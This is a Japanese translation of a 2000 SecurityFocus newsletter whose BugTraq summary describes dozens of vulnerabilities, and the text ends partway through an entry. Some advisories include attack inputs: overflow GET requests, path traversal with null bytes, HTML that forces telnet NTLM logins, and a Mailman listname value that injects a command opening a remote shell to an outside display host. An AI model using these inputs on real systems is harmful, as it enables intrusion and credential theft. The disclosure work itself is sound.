SecurityFocus.com Newsletter #60 2000-09-15->2000-09-21

To: BUGTRAQ-JP@SECURITYFOCUS.COM
Subject: SecurityFocus.com Newsletter #60 2000-09-15->2000-09-21
From: SAKAI Yoriyuki <sakai@LAC.CO.JP>
Date: Wed, 27 Sep 2000 17:46:38 +0900
Reply-To: SAKAI Yoriyuki <sakai@LAC.CO.JP>
Sender: BUGTRAQ-JP List <BUGTRAQ-JP@SECURITYFOCUS.COM>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

坂井@ラックです。

SecurityFocus.com Newsletter 第 60 号の和訳をお届けします。
訳のない項目については「日本語訳なし」として区別してあります。

- -------------------------------------------------------------------------
SecurityFocus.com Newsletter に関するFAQ:
<URL: http://www.securityfocus.com/forums/sf-news/faq.html>
BugTraq-JP に関する FAQ:
<URL: http://www.securityfocus.com/forums/bugtraq-jp/faq.html>
- -------------------------------------------------------------------------
引用に関する備考:
・この和訳は Security-Focus.com の許可を株式会社ラックが得た上で行わ
  れています。
・SecurityFocus.com Newsletter の和訳を Netnews, Mailinglist,
  World Wide Web, 書籍, その他の記録媒体で引用される場合にはメールの
  全文引用をお願いします。
・日本語版ニュースレター 1 号から 3 号までにはこの備考が付いていませ
  んが準用するものとします。
・また、Security-Focus.com 提供の BugTraq-JP アーカイブ [*1] へのいか
  なる形式のハイパーリンクも上記に準じてください。
1) <URL http://www.securityfocus.com/templates/archive.pike?list=79>
- -------------------------------------------------------------------------
- -------------------------------------------------------------------------
この和訳に関する備考:
・この和訳の適用成果について株式会社ラックは責任を負わないものとしま
  す。
- -------------------------------------------------------------------------
- -------------------------------------------------------------------------
訳者からのお知らせ:
・もし、typo や誤訳が見つかった場合、BUGTRAQ-JP へ Errata として修正
  版をご投稿頂くか、訳者にお知らせください。
  後者の場合には修正版をできるだけ迅速に発行します。
- -------------------------------------------------------------------------
- -------------------------------------------------------------------------

原版:
Message-ID:  <Pine.GSO.4.21.0009250923100.25947-100000@mail>
Date:         Mon, 25 Sep 2000 09:24:56 -0700

SecurityFocus.com Newsletter #60
- --------------------------------

I. FRONT AND CENTER
	1. New article in MS Focus Area: IIS Security Tips
	2. Re-synchronizing a NIDS

II. BUGTRAQ SUMMARY
	1. Mobius DocumentDirect for the Internet 1.2 Buffer Overflow Vulns
	2. SuSE Apache CGI Source Code Viewing
	3. GNOME esound Unsafe /tmp File Creation Vulnerability
	4. AIX netstat -Z Statistic Clearing Vulnerability
	5. Check Point Firewall-1 Session Agent Impersonation Vulnerability
	6. Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability
	7. SCO Unixware "/search97cgi/vtopic" Vulnerability
	8. Tmpwatch Recursive Write DoS Vulnerability
	9. muh IRC Log Format String Vulnerability
	10. NT Authentication PAM Modules Buffer Overflow Vulnerability
	11. Mailman 1.1 Writable Variable Vulnerability
	12. YaBB Arbitrary File Read Vulnerability
	13. Ranson Johnson mailto.cgi Piped Address Vulnerability
	14. MailForm 2.0 XX-attach_file  Vulnerability
	15. Microsoft WebTV DoS Vulnerability
	16. Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability
	17. Horde CGI Remote Command Execution Vulnerability
	18. EFTP Buffer Overflow Vulnerability
	19. EFTP Partial Input Denial of Service Vulnerability
	20. Mandrake /perl http Directory Disclosure Vulnerability
	21. IMP File Disclosure Vulnerability
	22. Jack De Winter WinSMTP Buffer Overflow Vulnerability
	23. Netegrity SiteMinder Authentication Bypass Vulnerability
	24. HP OpenView Network Node Manager Config Scripts Vulnerability
	25. Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
	26. Sambar Server (BETA) Search CGI Vulnerability
	27. CamShot Remote Buffer Overflow Vulnerability
	28. FreeBSD eject  Buffer Overflow Vulnerability
	29. Pine Malformed Header Denial of Service Vulnerability
	31. Alt-N MDaemon 3.1.1 DoS Vulnerability
	32. TYPSoft FTP Server remote DoS Vulnerability
	33. WebSphere Application Server Plugin DoS Vulnerability
	34. Microsoft Proxy 2.0 Internal Network Access Vulnerability
	35. Compaq Tru64 kdebugd Remote Arbitrary File Write Vulnerability
	36. Multiple Linux Vendor  klogd Vulnerability
	37. Microsoft Proxy 2.0 FTP Permissions Bypass Vulnerability
	38. Horde IMP Remote Command Execution via Sendmail Vulnerability
	39. Tridia DoubleVision Local Root Compromise
	40. Cisco PIX Firewall SMTP Content Filtering Evasion Vulnerability
	41. Microsoft Office 2000 DLL Execution Vulnerability
	42. KDE kvt Format String Vulnerability
	43. Ipswitch WinCOM LPD 1.00.90 DoS Vulnerability
	44. NetcPlus BrowseGate 2.80 DoS Vulnerability
	45. RedHat Glint /tmp Symbolic Link Vulnerability
	46. Extent RBS ISP Directory Traversal Vulnerability
	47. CiscoSecure ACS for Windows NT Buffer Overflow Vulnerability
	48. CiscoSecure ACS for Windows NT Oversized TACACS+ Packet DoS Vuln
	49. SuSE Installed Package Disclosure Vulnerability
	50. CiscoSecure ACS for Windows NT and LDAP Server Null Password Vuln

III. SECURITYFOCUS.COM NEWS ARTICLES
	1. The Cybercitizenship Charade
	2. Bill Would Restrict Carnivore
	3. Hackers Skin CueCat
	4. Digital Convergence Data Leaks

IV.SECURITY FOCUS TOP 6 TOOLS
	1. SAINT - Security Administrator's Integrated Network Tool
	2. Security Auditor's Research Assistant
	3. Screen Logger 1.0
	4. chkrootkit 0.17
	5. BUGS 3.4.0
	6. Winfingerprint 2.2.9

I. FRONT AND CENTER(日本語訳なし)
- ---------------------------------

II. BUGTRAQ SUMMARY
- -------------------

訳者注釈: 今号の Bugtraq Summary の 1 番から 29 番までは前号の 1 番から
30 番 (前号番号 16 番以外) と同内容が収録されています。

1. Mobius DocumentDirect for the Internet 1.2 Buffer Overflow Vulnerabilities
BugTraq ID: 1657
リモートからの再現性: あり
公表日: 2000-09-08
関連するURL:
http://www.securityfocus.com/bid/1657

まとめ:
Mobius 社が提供する DocumentDirect for the Internet プログラムには、未
チェックの多くの静的に割り当てられたバッファが存在する。
入力されるデータによっては、任意のプログラムの実行や Dos 攻撃をデータを
入力したサービスの権限レベルの下で行われてしまう。

バッファオーバーフローその 1 - 以下のような GET リクエストを発行し、
DDICGI.EXE をオーバーフローさせる。

GET /ddrint/bin/ddicgi.exe?[string at least 1553 characters long]=X
HTTP/1.0

バッファオーバーフローその 2 - Web 認証フォームで少なくとも 208 文字か
らなるユーザ名を入力し、DDIPROC.EXE をオーバーフローさせる。この文字列
がランダムな場合、DoS 攻撃が DocumentDirect Process Manager に実行され、
関係するすべてのサービスが停止するだろう。

バッファオーバーフローその3 - 以下のような GET リクエストを発行し、
DDICGI.EXE 中でのアクセス確認エラーを引き起こす。

GET /ddrint/bin/ddicgi.exe HTTP/1.0\r\nUser-Agent: [long string of
characters]\r\n\r\n

2. SuSE Apache CGI Source Code Viewing
BugTraq ID: 1658
リモートからの再現性: あり
公表日: 2000-09-07
関連するURL:
http://www.securityfocus.com/bid/1658
まとめ:

SuSE Linux のバージョン 6.3 と 6.4 (これ以前のバージョンも問題となる可
能性がある) は、Apache Web サーバ(SuSE のバージョン 6.4 ではバージョン
1.3.12) をインストールしている。

Apache の設定ファイル /etc/httpd/httpd.conf は、一つのエントリ (Alias
/cgi-bin-sdb/ /usr/local/httpd/cgi-bin/) からなる。そのため、 /cgi-bin/
にあるファイルは、http://target/cgi-bin-sdb のようなフォーマットの URL
でアクセスできてしまう。パスには /cgi-bin/ の文字列が含まれていないため、
不適切な権限が設定され、ファイルはサーバ上で実行されず、クライアントに
送られてしまう。

このため、/cgi-bin/ に保存される CGI スクリプトのソースコードを読むこと
が可能となる。

3. GNOME esound Unsafe /tmp File Creation Vulnerability
BugTraq ID: 1659
リモートからの再現性: なし
公表日: 2000-08-31
関連するURL:
http://www.securityfocus.com/bid/1659
まとめ:

人気のある GNOME 環境の一部である、esound パッケージには弱点が存在する。
バージョン 0.2.19 以前の esound は /tmp ディレクトリにいかなるユーザで
あっても書き込み可能なディレクトリを作成し、通常は Unix ドメインソケット
を保存するために利用する。
それに代えて、システム上の攻撃者はシンボリックリンクを生成することで、
esound を実行しているユーザが所有する任意のファイルやディレクトリが、
いかなるユーザ権限でも書き込み可能になってしまう。

4. AIX netstat -Z Statistic Clearing Vulnerability
BugTraq ID: 1660
リモートからの再現性: なし
公表日: 2000-09-03
関連するURL:
http://www.securityfocus.com/bid/1660
まとめ:

IBM 製の AIX 4.x.x に付属する netstat には問題がある。
いかなるローカルのユーザは netstat の -Z コマンドを、root 権限なしで利
用できてしまえるのである。このため、インタフェースについての統計情報は
リセットされてしまうのである。これは統計情報を利用するプログラムの動作
を阻害する可能性がある。

5. Check Point Firewall-1 Session Agent Impersonation Vulnerability
BugTraq ID: 1661
リモートからの再現性: あり
公表日: 1998-09-24
関連するURL:
http://www.securityfocus.com/bid/1661
まとめ:

Check Point が提供する Firewall-1 の "セッションエージェント" には弱点
が存在する。この弱点は FW-1 4.1 以前のセッションエージェントのすべての
バージョンに存在する。セッションエージェントは Windows 9x または、Windows NT
を動作しているコンピュータ上、ファイアウォールからの接続のためにポート
を開き、接続のための認証を要求している。ところが、この情報は、すべて平
文で送られ、なお、かつ、認証されていないのである。これは盗聴できること
を意味する。付け加えて、エージェントはいかなるホストからの接続も受け付
けてしまう。セッションエージェントに接続できるユーザなら、いかなるユー
ザであっても、Firewall-1 モジュールを装うことができ、ユーザ名とパスワー
ド情報を要求できる。
実行された場合、ユーザ名とパスワードを悪用されてしまう結果となる。

6. Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability
BugTraq ID: 1662
リモートからの再現性: あり
公表日: 2000-08-15
関連するURL:
http://www.securityfocus.com/bid/1662
まとめ:

Firewall-1 の Check Point セッションエージェント のすべてのバージョンに
は問題が存在する。セッションエージェントは以下の様に動作する。
ファイアウォールはクライアントマシンからの接続を確立する。その最中にユー
ザ名を入力するように要求し、入力されたユーザ名が存在すれば、パスワード
も同様に要求する。失敗した場合は、永遠にこの動作を繰り返す。このため、
ユーザ名とパスワードに対する単純なブルートフォース攻撃を許してしまう。

7. SCO Unixware "/search97cgi/vtopic" Vulnerability
BugTraq ID: 1663
リモートからの再現性: あり
公表日: 2000-09-11
関連するURL:
http://www.securityfocus.com/bid/1663
まとめ:
SCO Unixware の特定のバージョンでは、Web 上で利用できるヘルプシステムをデ
フォルトでインストールし、出荷されている。
このシステムは、httpd-scohelphttp という名称で、Web サーバが実行されて
いるアカウント (通常 'nobody') でしか読めないはずのファイルがリモートユー
ザにも読めるという問題のある CGI プログラムを含んでいる。

この問題は以下の CGI のために起こる。

 /usr/ns-home/httpd-scohelphttp/search97cgi/vtopic

この CGI は、検索の結果を使用するための HTML テンプレートを指定するため
に ViewTemplate というパラメータを利用する。

 http://unixware7box:457/search97cgi/vtopic?action=view&ViewTemplate=

しかしながら、この CGI は相対パスに何の制限もかけないため、ユーザはパス
を作成でき、そのため、(../) という文字列を利用して Web コンテンツのルー
トディレクトリの外部に移動できてしまうのである。

8. Tmpwatch Recursive Write DoS Vulnerability
BugTraq ID: 1664
リモートからの再現性: なし
公表日: 2000-09-09
関連するURL:
http://www.securityfocus.com/bid/1664
まとめ:

/tmp や /var/tmp に書き込み権限を持つユーザであれば、いかなるユーザであっ
ても、tmpwatch に redhat 6.1 (もしくは cron から tmpwatch を実行してい
れば他のディストリビューションでも) の応答を停止させることができ、結果、
通常動作の復旧のためにシステムの電源を入れ直さなければならなくなる可能
性がある。これは /tmp 中に多数の inode (例 6000個程度) をもつディレクト
リを生成するために引き起こされる。/tmp 以下のディレクトリのどの階層でも、
tmpwatch は自身の複製を fork() する。

9. muh IRC Log Format String Vulnerability
BugTraq ID: 1665
リモートからの再現性: あり
公表日: 2000-09-09
関連するURL:
http://www.securityfocus.com/bid/1665
まとめ:
muh は、irc クライアントとサーバの間でプロキシの役割を演じる。irc サー
バから見れば muh セッションは irc クライアントのように振る舞い、irc ク
ライアントから見れば muh セッションは irc サーバのように振る舞う。

muh には、クライアントが接続を切断したときに、クライアントのメッセージ
をログに取る機能がある。

バージョン 2.05 (それ以前のバージョンにも可能性がある) には、ログに取ら
れるメッセージがクライアントによっておきかえられた場合、muh をクラッシ
ュさせてしまうフォーマットバグの問題がある。また、このバグを利用するこ
とで muh を稼動しているユーザの権限で任意のプログラムを実行することが可
能である。

10. NT Authentication PAM Modules Buffer Overflow Vulnerability
BugTraq ID: 1666
リモートからの再現性: あり
公表日: 2000-09-11
関連するURL:
http://www.securityfocus.com/bid/1666
まとめ:

pam_smb と pam_ntdom は、Unix ユーザに NT ドメインコントローラへ認証す
るためのプラグインモジュールである。pam_smb モジュールにはリモートから
攻撃可能なバッファオーバーフローの弱点がある。pam_smb から派生する
pam_ntdom にも同様の弱点がある。この問題は、境界をチェックをすることな
く 16 バイトのスタックに長いユーザ名をコピーしてしまうために生じる。

11. Mailman 1.1 Writable Variable Vulnerability
BugTraq ID: 1667
リモートからの再現性: なし
公表日: 2000-09-07
関連するURL:
http://www.securityfocus.com/bid/1667
まとめ:

Mailman は MHonArc、または hypermail に外部のアーカイバを利用することで
メッセージをアーカイブ化する機能を備えている。内部から Mailman へはどの
変数に基づいているかをマクロが決めるために使われる可能性がある。

例えば、 $prefix/Mailman/mm_cfg.py に続くエントリを per-list に基づいて
リストアーカイブを保存することができる。

PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile
rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'

(listname) の値はリスト管理者によって各リストごとに生成できる。

listname 変数がシステムコマンドに設定された場合、Mailman がメッセージを
アーカイブに追加するためのリストにメッセージが送られるたびにそのコマン
ドが実行される。

例えば、listname の値が次のように設定された場合である。
`/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh`

リストがメッセージを受信したとき、埋め込まれたコマンドが実行され、この
例では、リモートから Web サーバの uid/gid 下でシェルを実行している
xterm を開くことができる。

PUBLIC_EXTERNAL_ARCHIVER の定義の設定によっては、他の変数の名前は受け付
けられる。

Solution タブ以下にパッチを置くことが、この %(listname)s 展開問題の唯一
の修正方法である。

12. YaBB Arbitrary File Read Vulnerability
BugTraq ID: 1668
リモートからの再現性: あり
公表日: 2000-09-10
関連するURL:
http://www.securityfocus.com/bid/1668
まとめ:

YaBB.pl は web 上での掲示板スクリプトで、書き込まれた内容をを数字で順番
付けられたファイルで管理する。順番付けられたファイルは、変数 num=<file>
という形で YaBB.pl に要求が出され特定される。また、そのファイルを検索す
る前にYaBB は <file> に .txt 拡張子を付加する。

YaBB 中で入力の妥当性を調べる際に問題があるために、相対パスが <file> に記
されてしまう。これは、../ という形のパスを含む。

付け加えて、<file> は数字である必要はなく、.txt 拡張子は、<file> に %00
を付加することで避けることができる。

1 回のリクエストでこの問題を利用することによって、悪意のあるユーザは、
Web サーバが参照できる任意のファイルを見ることが可能になる。

13. Ranson Johnson mailto.cgi Piped Address Vulnerability
BugTraq ID: 1669
リモートからの再現性: あり
公表日: 2000-09-11
関連する URL:
http://www.securityfocus.com/bid/1669
まとめ:

Ranson Johnson が提供する Combination Mail-to and Credit Card Orderform
中で使われる 'emailadd' 変数の値は、パイプを使ってマシンへの入り口を開
けるために利用される。この値はユーザがフォームを埋める際に入力される。
フォーム上の 'emailadd' フィールドに特別に組み立てられた値を入力するこ
とによって Web サーバの権限レベルでリモートからコマンドを実行される可能
性がある。

14. MailForm 2.0 XX-attach_file  Vulnerability
BugTraq ID: 1670
リモートからの再現性: あり
公表日: 2000-09-11
関連する URL:
http://www.securityfocus.com/bid/1670
まとめ:

MailForm 2.0 はメッセージを扱うために多数の隠しフォームフィールドを利用
している。隠しフォームフィールドは、ページをローカルコピーして編集する
ためや、望まない結果を得た時の履歴を残すために使われる。
この内、XX-attach_file フィールドの値は、CGI が参照できるファイルのコピー
を CGI が攻撃者に電子メールで送るように MailForm 2.0 を用いて修正するこ
とが可能である。

15. Microsoft WebTV DoS Vulnerability
BugTraq ID: 1671
リモートからの再現性: あり
公表日: 2000-09-12
関連する URL:
http://www.securityfocus.com/bid/1671
まとめ:

リモートユーザが UDP パケットを WebTV for Windows が稼動するシステムの
22701 番から22705 番の任意のポートに送ると、システムは完全にクラッシュ
してしまうか、少なくともプログラムは応答を停止する。

同様に、UDP パケットを 22703 番ポートに送ることで、自動的に再起動してし
まうことが既知となっている。

16. Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability
BugTraq ID: 1673
リモートからの再現性: あり
公表日: 2000-09-11
関連する URL:
http://www.securityfocus.com/bid/1673
まとめ:

Microsoft Windows 2000 の RPC サービスにある固有の弱点のために、Windows
2000 上の RPC サービスをクラッシュする可能性がある。そのため 入ってくる
RPC リクエストを拒否してしまう。巧く改竄した RPC パケットを 135 番から
139 番、または 445 番ポートを通して Windows 2000 サーバに送ることで、
RPC サービスを完全に停止できる。通常の機能を回復するためには再起動が必
要である。

17. Horde CGI Remote Command Execution Vulnerability
BugTraq ID: 1674
リモートからの再現性: なし
公表日: 2000-09-08
関連する URL:
http://www.securityfocus.com/bid/1674
まとめ:

Horde は、Web 上で生産性、伝言、計画管理を行なう PHP 言語で書かれたアプ
リケーションで、GPL かつ LGPL ライセンスの下で配布されている。電子メー
ルを送信するためには、コマンドの文字列 (シェルによって分解される) の一
部としてユーザの入力を用いて sendmail を実行するために popen を利用する。
ユーザの入力として生成されるパラメータの一つ、"form" の値は、horde が稼
動しているサーバへのリモートアクセスに利用できてしまう。スクリプトは、
変数の値が popen() 関数によって実行されるシェルに送られる前に正しい値で
あるか確認しない。結果として、攻撃者が標的となるホストの Web サーバの権
限でアクセスを許してしまう可能性があり、最初に Horde からメールを送るこ
とができるようになる(大抵の場合は認証され、そのためローカルの弱点に分類
される)。"from" フィールドは、このような問題に関係する唯一のパラメータ
である。他の変数はどんなメタ文字を消去する関数によって保護される。

18. EFTP Buffer Overflow Vulnerability
BugTraq ID: 1675
リモートからの再現性: あり
公表日: 2000-09-11
関連する URL:
http://www.securityfocus.com/bid/1675
まとめ:

EFTP は、Khalim Landross が作成した暗号化と通常の 2 種類のファイル転送
機能を提供するフリーウエアの ftp クライアントとサーバのパッケージである。
サーバが 2100 文字以上のリクエストを受信した場合、関係のないデータによ
って上書きされるメモリ領域のため、クラッシュしてしまう。大抵の場合、サ
ーバがクラッシュする。リクエストが巧妙に組み立てられたものである場合、
EFTP を稼動させているサーバ上で任意のプルグラムを実行することが可能であ
る。

19. EFTP Partial Input Denial of Service Vulnerability
BugTraq ID: 1677
リモートからの再現性: あり
公表日: 2000-09-11
関連する URL:
http://www.securityfocus.com/bid/1677
まとめ:

EFTP は、Khalim Landross が作成した暗号化された ftp をサポートする小型
のフリー ftp サーバである。多くの FTP サーバがそうであるように、入って
くるデータバッファの改行文字を基にサーバへのリクエストを分解する。不運
なことに、EFTP は接続が閉じる前に改行文字が全くないリクエストを受け取る
ことが考慮に入れられてないため、そういったリクエストがなされた場合、予
期できない振る舞いをしてしまう弱点がソフトウエアに残ったままである。ク
ライアントが ftp サーバに接続し、"リクエストを終了する"ための改行文字を
含まないデータを送信すると、サーバは DoS 状態に陥ってしまう。

20. Mandrake /perl http Directory Disclosure Vulnerability
BugTraq ID: 1678
リモートからの再現性: あり
公表日: 2000-09-11
関連する URL:
http://www.securityfocus.com/bid/1678
まとめ:

Mandrake Linux 6.1 から 7.1 に含まれて出荷されている一連のmod_perlのデ
フォルトの設定ファイルには、ある状況ではセキュリティ上の懸念となる設定
ミスがある。/perl ディレクトリは、Perl スクリプトを保存するために使われ
る Web サーバの Web ドキュメント用のルートディレクトリツリー(Web サーバ
上でファイルにアクセスできるサブディレクトリツリー)の一部である。Apache
の perl インタプリタモジュールである mod_perl の設定ファイル中に、この
ディレクトリは"indexed"に制限されている。この"indexed"の意味することは、
Web サーバは Web サーバ自身からリクエストを受けた場合、ディレクトリの内
容を表示するということである。その結果、攻撃者は /perl 中のファイルが何
かを知ることができる。このバグはどのように Web サーバがディレクトリ中の
ファイルを解釈するかには関係がないが (例. まだ実行中である)、そこで何が
実行されているかを知ることは、スクリプトのリストから弱点のあるスクリプ
トに的を絞ったより知的な攻撃をするために有益である。

21. IMP File Disclosure Vulnerability
BugTraq ID: 1679
リモートからの再現性: あり
公表日: 2000-09-12
関連するURL:
http://www.securityfocus.com/bid/1679
まとめ:

IMP は PHP のスクリプト群からなる、IMAP を利用した Web メールを提供する
システムである。特定のバージョンの IMP は、IMP が攻撃者にメールを送付し
てしまうことにより、攻撃者がサーバ内のファイルを入手でき得てしまえる問題
がある。

この問題はユーザが与えた価が PHP スクリプトに渡されてしまうために生じる
ものである。問題となるスクリプトは、通常、IMP を使う上で、添付ファイル
を追跡するためのあらかじめ定義されている変数を用いる前提がある。
これに関連する変数は以下が典型的な例である。

 attachments_name[]

この変数には通常メールの受け取り手が読み取ることができないファイルをユー
ザによって指定可能なのである。この行為は IMP を実行させているユーザ権
限で行われる。読み取ることができる条件は IMP を実行させているユーザ権
限に依存する問題である。攻撃者へファイルを添付して送り出せてしまう問題
に付け加えるならば、IMP は添付した後に、ファイルを unlink するのである。
もしこの対象となったファイルが IMP を実行しているユーザによって書き込み
可能な場合、ファイルは削除されてしまう。

22. Jack De Winter WinSMTP Buffer Overflow Vulnerability
BugTraq ID: 1680
リモートからの再現性: あり
公表日: 2000-09-11
関連するURL:
http://www.securityfocus.com/bid/1680
まとめ:

Jack De Winter氏による　Win SMTP デーモンの SMTP および POP3 コンポー
ネントには数多くの未チェックのバッファがあり、DoS 、あるいは与えられた
データによっては意図的なコードの実行をもたらす問題がある。

約 170 バイトを越える HELO コマンド、約 370 バイトを越える USER コマン
ドを与えた場合、Windows 一般保護エラー(訳注: ワトソン博士の起動)を生じ
る。

23. Netegrity SiteMinder Authentication Bypass Vulnerability
BugTraq ID: 1681
リモートからの再現性: あり
公表日: 2000-09-11
関連するURL:
http://www.securityfocus.com/bid/1681
まとめ:

Netegrity 社が提供する SiteMinder ソフトウェアはサーバ上にある Web コ
ンテンツにアクセスコントロールを提供するよう設計されている。
しかし、特別に改ざんされた URL を与えることによって、未認証のクライア
ントが保護されているコンテンツへ読みだし権限を得られ、あるいは、保護さ
れたコンテンツの実行ができてしまえるのである。

もし URL が目的とする URL に続けて '/$/nonexistantfile.ext' を付けて
与えられた際、サーバはプロンプトを出力することなく、あるいは、なんら
認証を求めることなくリクエストされたコンテンツをクライアントを返して
しまうのである。存在しないファイルの拡張子はチェックされ、.ccc, .jpg
についてのみ、それがチェックされることが判明できている。

なお、保護されているコンテンツが CGI アプリケーションである場合、付け
加えられる文字列の前に変数と価が指定される。もし、価が指定されなかった
場合には、サーバは CGI のソースを返してしまう。

24. HP OpenView Network Node Manager Config Scripts Vulnerability
BugTraq ID: 1682
リモートからの再現性: 未詳
公表日: 2000-09-12
関連するURL:
http://www.securityfocus.com/bid/1682
まとめ:

HP が発表したアドバイザリ、HPSBUX0009-120 によると、OpenView NNM に含
まれるデータベース設定用スクリプトにはセキュリティ上不十分な点があり、
ログイン時にユーザに不正な権限を取得させてしまえる問題がある。

25. Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability
BugTraq ID: 1683
リモートからの再現性: あり
公表日: 2000-09-14
関連するURL:
http://www.securityfocus.com/bid/1683
まとめ:

デフォルト状態で、Microsoft Windows 2000 に付属する telnet クライアン
ト (telnet.exe) は Windows NT Challenge/Response (NTLM) を認証手段に用
いている。このクライアントがホストとコネクションを確立する際、NTLM で
の認証を、telnet サーバが Windows telnet サーバかどうかには関係なく、
試みてしまう。このため、NTLM challenge/response セッションはモニタ可能
で、ユーザ名、パスワード、ドメイン等の重要な情報を漏洩させてしまう様に
クラック可能である。
NTLM challenge/response プロトコルはブルートフォース攻撃を、例えば
"L0phtcrack" に代表されるツールを用いて、受ける可能性がある。

リモートのターゲットで telnet セッションを強制的に開始できる事は、
可能性があり得る問題である。例えば、Microsoft Internet Explorer,
Outlook (Express), Netscape Navigator といった製品は自動的に "telnet://"
という資源名が付いた URL を自動的にデフォルトの telnet クライアント
(通常、telnet.exe である) でアクセスするからである。
以下はアクセスされたサーバによって、telnet セッションが開始される例を
示したものである。

1)

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://target>
</frameset>
</html>

2)

<html>
<head>
<meta http-equiv="refresh" content="0;URL=telnet://target">
</head>
</html>

3)

<script>window.open("telnet://target")</script>


26. Sambar Server (BETA) Search CGI Vulnerability
BugTraq ID: 1684
リモートからの再現性: あり
公表日: 2000-09-15
関連するURL:
http://www.securityfocus.com/bid/1684
まとめ:

Sambar サーバは Sybase Open Client/Open Server に続く、three-tier 方式
の通信インフラストラクチャも出るをテストするために設計されたソフトウェ
アである。これは、HTTP プロトコルスタックへの追加により、WWW で配布され
るコンテンツの動的配送を平滑化するインフラストラクチャという概念を元に
しており、HTTP 経由で既存のユーザへの通知機能を提供するために効果的な結
果が得られる、というものである。

元々このソフトウェアは Sun Workstation (UNIX) で開発され、PC 環境 (Win32)
へ移植され、商業目的でライセンスが提供されている。1996年の終わりに完全に
基本的なコードが書き直しされた後、様々な機能が追加され、1997 年 2 月に
バージョン 3.0 が提供開始されている。また、バージョン 4.0 は 1997 年の
5月半ばに提供開始されている。

このソフトウェアの特定のベータバージョンの search.dll には、リモートの
攻撃者が SAMBAR Server の内容、例えばメールフォルダを参照できてしまえる
問題がある。なお、現在利用できる情報によると、この問題はこのソフトウェア
の「ベータ」版に含まれる問題であることが強調されている。

27. CamShot Remote Buffer Overflow Vulnerability
BugTraq ID: 1685
リモートからの再現性: あり
公表日: 2000-09-15
関連するURL:
http://www.securityfocus.com/bid/1685
まとめ:

CamShot は Windows 95/98/NT/2000 で動作する Web サーバであり、ビデオカ
メラで撮影された時刻暦付き画像を Web ページとして提供するソフトウェア
である。画像は Web ブラウザを用い、ネットワーク上のいかなる場所からで
も参照可能である。このソフトウェアは Video for Windows 互換の画像取り
扱い操作が可能である。
このソフトウェアの特定の試供版では、認証用パスワードとして非常に長い文
字列が与えられることによりバッファオーバーフローがリモートから引き起こ
し可能である問題を抱えている。

なお、同様の問題が商業版でも生じるかどうかについては未詳である。

28. FreeBSD Eject Local Root Vulnerability
BugTraq ID: 1686
リモートからの再現性: なし
公表日: 2000-09-13
関連するURL:
http://www.securityfocus.com/bid/1686
まとめ:

eject コマンドにはローカルのユーザが root 権限をバッファオーバーフロー
を用いることで奪取する可能性がある、攻撃可能なバッファがある。

29. Pine Malformed Header Denial of Service Vulnerability
BugTraq ID: 1687
リモートからの再現性: あり
公表日: 2000-09-13
関連するURL:
http://www.securityfocus.com/bid/1687
まとめ:

Pine は UNIX のコンソールで利用可能な最も著名な電子メールクライアントで
ある。改ざんされた X-Keywords ヘッダ (このヘッダは電子メールのヘッダの一
部として取り扱われる)(訳注: X- で始まっているため、拡張ヘッダの一種です)
を含むメールボックス内のメッセージに、pine がアクセスした際、メールボッ
クス内のファイルを解釈しようと試みる時点でクライアントは何ら停止理由をユー
ザへ示すことなく、クラッシュしてしまう。
この結果、悪意ある改ざんされたヘッダを持つメッセージが削除されるまで、
電子メールの受信者は DoS 状態に陥れられてしまう。

30. Microsoft Exchange Server Empty MIME Boundary DoS
BugTraq ID: 1688
リモートからの再現性: あり
公表日: 1999-02-15
関連するURL:
http://www.securityfocus.com/bid/1688
まとめ:

MIME形式のメッセージの Content-Type フィールドに境界文字がない場合、
Exchange サーバは、その形式のメッセージを中継しようとする際に、機能を
停止してしまう。

以下は Microsoft Knowledge Base の Q217155 に依る: Microsoft Internet
Mail Servive が長い MIME プロローグを持つ MIME 形式のメッセージを受け、
メッセージが中継される際、内容変換中に無限ループに陥り、その結果、 .stf
の拡張子を持つ一時ファイルがディスク領域を使い果たすまで増加するか、
あるいは Internet Mail Service がシャットダウンしてしまう。.stf ファイ
ルは POP3 あるいは IMAP クライアントがメールをサーバからダウンロードす
る際にも容量の増加を起こす。

これは、MIME 形式のボディパートに先立つ境界文字が設定されていない場合に、
ボディパートがプロローグの一部として解釈されてしまうための典型的な問題で
ある。もし、プロローグが、現在利用可能なバッファ領域である約 76 バイトよ
り十分に大きい場合、プロローグは有効として取り扱われるが、境界文字に対し
て割り当て可能な領域を使い果たしてしまうのである。
この結果、無限ループが、一時ファイルがディスク領域一杯を使い果たすまで何
度も同じプロローグを処理することにより、発生するのである。

31. Alt-N MDaemon 3.1.1 DoS Vulnerability
BugTraq ID: 1689
リモートからの再現性: あり
公表日: 2000-09-18
関連するURL:
http://www.securityfocus.com/bid/1689
まとめ:

Alt-N MDaemon 3.1.1 には DoS が生じる可能性がある。もしリモートのユーザ
が特別に組み立てられた URL を MDaemon に付属する Web サービスへ与えた際、
サービスはクラッシュする可能性がある。通常動作への復旧はサービスの再起動
が必要である。

32. TYPSoft FTP Server remote DoS Vulnerability
BugTraq ID: 1690
リモートからの再現性: あり
公表日: 1999-06-08
関連するURL:
http://www.securityfocus.com/bid/1690
まとめ:

長いコマンド (例えば 2048 バイト) を TYPSoft FTP Server cab へ送った場合、
サーバはハングアップしてしまう。通常動作への復旧は手動での再起動が必要
である。

Noam Rathaus によるこの問題についてのアドバイザリが公開された後
(アドバイザリは http://www.BeyondSecurity.com から公開)、以下に示す追加
情報が寄せられている。

「この製品は問題を更に抱えている。サーバへ接続しても、なにもしないので
ある(SYN/ACK シーケンスを行うが、直ちにはシーケンス処理を終えない)。
これはこの製品が DELPHI TSocket クラスライブラリを使っているために起こ
る問題である。このライブラリはシーケンス処理の取り扱いを全く誤まってい
るのである。」

33. WebSphere Application Server Plugin DoS Vulnerability
BugTraq ID: 1691
リモートからの再現性: あり
公表日: 2000-09-15
関連するURL:
http://www.securityfocus.com/bid/1691
まとめ:

非常に大量のデータ (1092 個以上の文字列) を Host: リクエストヘッダへ
